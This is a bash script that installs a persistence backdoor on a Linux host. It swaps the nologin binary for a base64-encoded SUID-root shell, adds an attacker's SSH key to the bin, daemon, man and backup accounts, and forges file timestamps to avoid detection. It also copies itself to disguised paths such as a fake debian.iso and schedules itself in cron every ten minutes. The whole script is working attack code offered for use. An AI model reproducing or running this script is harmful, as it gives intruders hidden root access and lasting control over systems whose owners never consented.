# First, should we run quiet?
if [ "$1" == "-q" ]
then
    QUIET=1
else
    QUIET=0
fi

PASSWD="/etc/passwd"
#PASSWD_TS=$(stat -c '%y' $PASSWD)
#PASSWD_BK="/var/tmp/p.b"
NOLOGIN_BK="/var/tmp/nl.b"

# back up passwd
#(( $QUIET )) || echo "Backing up passwd file"
#cp $PASSWD $PASSWD_BK
#touch -d "$PASSWD_TS" $PASSWD_BK

NOLOGIN=$(grep nologin $PASSWD | head -n1 | awk -F: '{print $NF}')

# Back up nologin
(( $QUIET )) || echo "Backing up nologin file"
NOLOGIN_TS=$(stat -c '%y' $NOLOGIN)
if [ -f $NOLOGIN_BK ]
then
    (( $QUIET )) || echo "Already backed up this file! Skipping..."
    true
else
    mv $NOLOGIN $NOLOGIN_BK
fi

PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLYmzhbd5UNMKb6GC24DVkC0CMts4WpqEczp/zuBh4sz/ivMR9xXkhFZ/dM2Q10EUqB+aXnZmfNjbp9nY0YPCkVuJqsdweKAhhYqQplVXFLSQ4zVPTkYGWyObWUEwr/2dwHuw2u5I3zNmq7r4ri4e5HY6G5hBP00pAasB8VgtcheMYqs+PCOWpiLpKeOjoCdA/L4WOvXr48yqJmmuipsZB95EseFbJxUDkIorJGuVxmGCg1XcolaqtuWSbHjecQ/dnyxkKMjZECra23VNV00s5CSM0e4fzvkZYZ6w5I3e833Hol2R4/CNMLRMkGUgyemCOn5zIarEnd8CZZd4kMJqz"

SHELL="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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAGAAAAAAAAkAYAAAAAAAABAAAAAAAAAAEAAAAAAAAADAAAAAAAAABgBQAAAAAAAA0AAAAAAAAAlAcAAAAAAAAZAAAAAAAAAKgNIAAAAAAAGwAAAAAAAAAIAAAAAAAAABoAAAAAAAAAsA0gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAACYAgAAAAAAAAUAAAAAAAAAkAMAAAAAAAAGAAAAAAAAALgCAAAAAAAACgAAAAAAAACSAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAAVAAAAAAAAAAAAAAAAAAAAAwAAAAAAAACoDyAAAAAAAAIAAAAAAAAASAAAAAAAAAAUAAAAAAAAAAcAAAAAAAAAFwAAAAAAAAAYBQAAAAAAAAcAAAAAAAAAWAQAAAAAAAAIAAAAAAAAAMAAAAAAAAAACQAAAAAAAAAYAAAAAAAAAB4AAAAAAAAACAAAAAAAAAD7//9vAAAAAAEAAAgAAAAA/v//bwAAAAA4BAAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAACIEAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuA0gAAAAAAAAAAAAAAAAAAAAAAAAAAAAlgUAAAAAAACmBQAAAAAAALYFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBAgAAAAAABHQ0M6IChVYnVudHUgNy40LjAtMXVidW50dTF+MTguMDQuMSkgNy40LjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABADgCAAAAAAAAAAAAAAAAAAAAAAAAAwACAFQCAAAAAAAAAAAAAAAAAAAAAAAAAwADAHQCAAAAAAAAAAAAAAAAAAAAAAAAAwAEAJgCAAAAAAAAAAAAAAAAAAAAAAAAAwAFALgCAAAAAAAAAAAAAAAAAAAAAAAAAwAGAJADAAAAAAAAAAAAAAAAAAAAAAAAAwAHACIEAAAAAAAAAAAAAAAAAAAAAAAAAwAIADgEAAAAAAAAAAAAAAAAAAAAAAAAAwAJAFgEAAAAAAAAAAAAAAAAAAAAAAAAAwAKABgFAAAAAAAAAAAAAAAAAAAAAAAAAwALAGAFAAAAAAAAAAAAAAAAAAAAAAAAAwAMAIAFAAAAAAAAAAAAAAAAAAAAAAAAAwANAMAFAAAAAAAAAAAAAAAAAAAAAAAAAwAOANAFAAAAAAAAAAAAAAAAAAAAAAAAAwAPAJQHAAAAAAAAAAAAAAAAAAAAAAAAAwAQAKAHAAAAAAAAAAAAAAAAAAAAAAAAAwARALAHAAAAAAAAAAAAAAAAAAAAAAAAAwASAPAHAAAAAAAAAAAAAAAAAAAAAAAAAwATAKgNIAAAAAAAAAAAAAAAAAAAAAAAAwAUALANIAAAAAAAAAAAAAAAAAAAAAAAAwAVALgNIAAAAAAAAAAAAAAAAAAAAAAAAwAWAKgPIAAAAAAAAAAAAAAAAAAAAAAAAwAXAAAQIAAAAAAAAAAAAAAAAAAAAAAAAwAYABAQIAAAAAAAAAAAAAAAAAAAAAAAAwAZAAAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAAAMAAAAAgAOAAAGAAAAAAAAAAAAAAAAAAAOAAAAAgAOAEAGAAAAAAAAAAAAAAAAAAAhAAAAAgAOAJAGAAAAAAAAAAAAAAAAAAA3AAAAAQAYABAQIAAAAAAAAQAAAAAAAABGAAAAAQAUALANIAAAAAAAAAAAAAAAAABtAAAAAgAOANAGAAAAAAAAAAAAAAAAAAB5AAAAAQATAKgNIAAAAAAAAAAAAAAAAACYAAAABADx/wAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAACgAAAAAQASAPQIAAAAAAAAAAAAAAAAAAAAAAAABADx/wAAAAAAAAAAAAAAAAAAAACuAAAAAAATALANIAAAAAAAAAAAAAAAAAC/AAAAAQAVALgNIAAAAAAAAAAAAAAAAADIAAAAAAATAKgNIAAAAAAAAAAAAAAAAADbAAAAAAARALAHAAAAAAAAAAAAAAAAAADuAAAAAQAWAKgPIAAAAAAAAAAAAAAAAAAEAQAAEgAOAJAHAAAAAAAAAgAAAAAAAAAUAQAAIAAAAAAAAAAAAAAAAAAAAAAAAABsAQAAIAAXAAAQIAAAAAAAAAAAAAAAAAAwAQAAEAAXABAQIAAAAAAAAAAAAAAAAAAOAQAAEgAPAJQHAAAAAAAAAAAAAAAAAAA3AQAAEgAAAAAAAAAAAAAAAAAAAAAAAABLAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABqAQAAEAAXAAAQIAAAAAAAAAAAAAAAAAB3AQAAIAAAAAAAAAAAAAAAAAAAAAAAAACGAQAAEQIXAAgQIAAAAAAAAAAAAAAAAACTAQAAEQAQAKAHAAAAAAAABAAAAAAAAACiAQAAEgAOACAHAAAAAAAAZQAAAAAAAAC6AAAAEAAYABgQIAAAAAAAAAAAAAAAAABwAQAAEgAOANAFAAAAAAAAKwAAAAAAAACyAQAAEAAYABAQIAAAAAAAAAAAAAAAAAC+AQAAEgAOANoGAAAAAAAAOgAAAAAAAADDAQAAEgAAAAAAAAAAAAAAAAAAAAAAAADXAQAAEQIXABAQIAAAAAAAAAAAAAAAAADjAQAAIAAAAAAAAAAAAAAAAAAAAAAAAAD9AQAAEgAAAAAAAAAAAAAAAAAAAAAAAAARAgAAIgAAAAAAAAAAAAAAAAAAAAAAAACsAQAAEgALAGAFAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjc2OTcAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AHNoZWxsLmMAX19GUkFNRV9FTkRfXwBfX2luaXRfYXJyYXlfZW5kAF9EWU5BTUlDAF9faW5pdF9hcnJheV9zdGFydABfX0dOVV9FSF9GUkFNRV9IRFIAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fbGliY19jc3VfZmluaQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX2VkYXRhAHN5c3RlbUBAR0xJQkNfMi4yLjUAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMi41AF9fZGF0YV9zdGFydABfX2dtb25fc3RhcnRfXwBfX2Rzb19oYW5kbGUAX0lPX3N0ZGluX3VzZWQAX19saWJjX2NzdV9pbml0AF9fYnNzX3N0YXJ0AG1haW4Ac2V0Z2lkQEBHTElCQ18yLjIuNQBfX1RNQ19FTkRfXwBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAHNldHVpZEBAR0xJQkNfMi4yLjUAX19jeGFfZmluYWxpemVAQEdMSUJDXzIuMi41AAAuc3ltdGFiAC5zdHJ0YWIALnNoc3Ry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" 

# pwn
(( $QUIET )) || echo "Installing backdoor"
echo $SHELL | base64 -d > $NOLOGIN
touch -d "$NOLOGIN_TS" $NOLOGIN
chown root:root $NOLOGIN
chmod 4755 $NOLOGIN

# Manipulate /etc/shells
SHELLS_TS=$(stat -c '%y' /etc/shells)
if [[ -z $(grep $NOLOGIN /etc/shells) ]]
then
    echo $NOLOGIN >> /etc/shells
    touch -d "$SHELLS_TS" /etc/shells
else
    (( $QUIET )) || echo "nologin already in shells!"
    true
fi

(( $QUIET )) || echo "Creating users"
# now create the keys, also use the old /etc/shells
# timestamp so the authorized keys files don't
# show up in a find -mtime sweep
# BIN user
(( $QUIET )) || echo "Adding key to bin user..."
BINHOME=$(grep ^bin $PASSWD | awk -F: '{print $(NF-1)}')
if [ -z "$BINHOME" ]
then
    (( $QUIET )) || echo "User doesn't exist!"
    true
else
    mkdir -p ${BINHOME}/.ssh
    echo $PUBKEY > ${BINHOME}/.ssh/authorized_keys
    chown -R bin:bin ${BINHOME}/.ssh
    chmod 700 ${BINHOME}/.ssh/
    chmod 600 ${BINHOME}/.ssh/authorized_keys
    touch -d "$SHELLS_TS" ${BINHOME}/.ssh ${BINHOME}/.ssh/authorized_keys
fi

# daemon user
(( $QUIET )) || echo "Adding key to daemon user..."
DAEMONHOME=$(grep ^daemon $PASSWD | awk -F: '{print $(NF-1)}')
if [ -z "$DAEMONHOME" ]
then
    (( $QUIET )) || echo "User doesn't exist!"
    true
    # put a true here so the cleanup script won't barf
else
    mkdir -p ${DAEMONHOME}/.ssh
    echo $PUBKEY > ${DAEMONHOME}/.ssh/authorized_keys
    chown -R daemon:daemon ${DAEMONHOME}/.ssh
    chmod 700 ${DAEMONHOME}/.ssh/
    chmod 600 ${DAEMONHOME}/.ssh/authorized_keys
    touch -d "$SHELLS_TS" ${DAEMONHOME}/.ssh ${DAEMONHOME}/.ssh/authorized_keys
fi

# man user
(( $QUIET )) || echo "Adding key to man user..."
MANHOME=$(grep ^man $PASSWD | awk -F: '{print $(NF-1)}')
if [ -z "$MANHOME" ]
then
    (( $QUIET )) || echo "User doesn't exist!"
    true
else
    mkdir -p ${MANHOME}/.ssh
    echo $PUBKEY > ${MANHOME}/.ssh/authorized_keys
    chown -R man:man ${MANHOME}/.ssh
    chmod 700 ${MANHOME}/.ssh/
    chmod 600 ${MANHOME}/.ssh/authorized_keys
    touch -d "$SHELLS_TS" ${MANHOME}/.ssh ${MANHOME}/.ssh/authorized_keys
fi

# backup user
(( $QUIET )) || echo "Adding key to backup user..."
BACKUPHOME=$(grep ^backup $PASSWD | awk -F: '{print $(NF-1)}')
if [ -z "$BACKUPHOME" ]
then
    (( $QUIET )) || echo "User doesn't exist!"
    true
else
    mkdir -p ${BACKUPHOME}/.ssh
    echo $PUBKEY > ${BACKUPHOME}/.ssh/authorized_keys
    chown -R backup:backup ${BACKUPHOME}/.ssh
    chmod 700 ${BACKUPHOME}/.ssh/
    chmod 600 ${BACKUPHOME}/.ssh/authorized_keys
    touch -d "$SHELLS_TS" ${BACKUPHOME}/.ssh ${BACKUPHOME}/.ssh/authorized_keys
fi

# Now let's strip the comments and store this file in a few nasty places
mkdir -p /lib/modprobe.d/
mkdir -p /media/cdrom1/
mkdir -p /usr/local/lib
grep -v '^#' $0 | grep . | grep -v '(( $QUIET ))'> /etc/tmux.cf
grep -v '^#' $0 | grep . | grep -v '(( $QUIET ))'> /lib/modprobe.d/systemctrl.conf
grep -v '^#' $0 | grep . | grep -v '(( $QUIET ))'> /media/cdrom1/debian.iso
grep -v '^#' $0 | grep . | grep -v '(( $QUIET ))'> /usr/local/lib/python3.9

# Don't forget to reset the timestamps
touch -d "$SHELLS_TS" /lib/modprobe.d/ /media/cdrom1/ /usr/local/lib /etc/tmux.cf /lib/modprobe.d/systemctrl.conf /media/cdrom1/debian.iso /usr/local/lib/python3.9

# Now let's install them into users' crontab
echo "*/10 * * * * sleep 5 && bash /etc/tmux.cf -q > /dev/null 2>&1" | crontab -u bin - 2>/dev/null
echo "*/10 * * * * sleep 10 && bash /lib/modprobe.d/systemctrl.conf -q > /dev/null 2>&1" | crontab -u daemon - 2>/dev/null
echo "*/10 * * * * sleep 15 && bash /media/cdrom1/debian.iso -q > /dev/null 2>&1" | crontab -u man - 2>/dev/null
echo "*/10 * * * * sleep 20 && bash /usr/local/lib/python3.9 -q > /dev/null 2>&1" | crontab -u backup - 2>/dev/null

(( $QUIET )) || echo "Done! You should probably delete me!"
